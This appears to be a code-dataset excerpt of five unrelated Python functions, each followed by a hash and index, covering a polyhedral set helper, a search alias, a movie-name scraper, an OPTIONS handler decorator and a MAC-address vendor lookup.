def get_u0(u0_type, num_features): """return a polyhedral definition for U^0, B_mat and b_vec""" assert u0_type in ["box", "positive_normed"] if u0_type == "box": B_mat, b_vec = U0_box(num_features) if u0_type == "positive_normed": B_mat, b_vec = U0_positive_normed(num_features) return B_mat, b_vec
bb6856284067ac3d5b39ca50d30c5745a7ee5e07
3,652,545
def funcparser_callable_search_list(*args, caller=None, access="control", **kwargs): """ Usage: $objlist(#123) Legacy alias for search with a return_list=True kwarg preset. """ return funcparser_callable_search(*args, caller=caller, access=access, return_list=True, **kwargs)
511bff6803ba9b088fa94d32e9cb3f85c4823b94
3,652,546
def upcoming_movie_name(soup): """ Extracts the list of movies from BeautifulSoup object. :param soup: BeautifulSoup object containing the html content. :return: list of movie names """ movie_names = [] movie_name_tag = soup.find_all('h4') for _movie in movie_name_tag: _movie_result = _movie.find_all('a') try: _movie_name = _movie_result[0]['title'] movie_names.append(_movie_name) except KeyError as e: continue return movie_names
6bac06375109ec103492a079746e2c0364bfac17
3,652,547
def options(*args, **kw): """Mark the decorated function as a handler for OPTIONS requests.""" return _make_handler_decorator('OPTIONS', *args, **kw)
21e6f830e054a84cd16e5cdfbb63c2202ff70d7b
3,652,548
import codecs import json def lookup_vendor_name(mac_address): """ Translates the returned mac-address to a vendor """ url = "http://macvendors.co/api/%s" % mac_address request = urllib2.Request(url, headers={'User-Agent': "API Browser"}) try: response = urllib2.urlopen(request) reader = codecs.getreader("utf-8") obj = json.load(reader(response)) response.close() return obj['result']['company'] except urllib2.URLError: return "Unable to lookup MAC address" except KeyError: return "MAC lookup API changed"
ad854390256c87c537b1d8e4e8906b3b3d0b10bd
3,652,549